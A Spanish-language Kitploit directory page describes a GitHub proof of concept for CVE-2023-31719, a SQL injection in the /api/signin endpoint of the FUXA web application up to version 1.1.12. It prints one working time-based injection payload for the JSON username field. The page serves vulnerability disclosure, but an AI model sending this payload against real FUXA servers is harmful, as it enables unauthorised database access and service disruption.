Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-31719 — Exploit de prueba de concepto para CVE-2023-31719, que demuestra inyección SQL en el endpoint /api/signin de la aplicación web FUXA mediante un parámetro username JSON manipulado. | Kitploit
Herramientas/GitHubGitHub/mateustesser/cve-2023-31719
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Seguridad de APIsPruebas de PenetraciónSeguridad de Bases de Datos
GitHubmateustesser/cve-2023-31719

CVE-2023-31719

Exploit de prueba de concepto para CVE-2023-31719, que demuestra inyección SQL en el endpoint /api/signin de la aplicación web FUXA mediante un parámetro username JSON manipulado.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-31719

Es posible inyectar código SQL en el parámetro JSON "username" del endpoint /api/signin mediante una solicitud HTTP POST

{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}

Nombre del producto afectado: FUXA

Versión afectada: <= 1.1.12

Problema: Inyección SQL

Descripción: Es posible inyectar código SQL en el parámetro JSON "username" del endpoint /api/signin mediante una solicitud HTTP POST

Descargar herramienta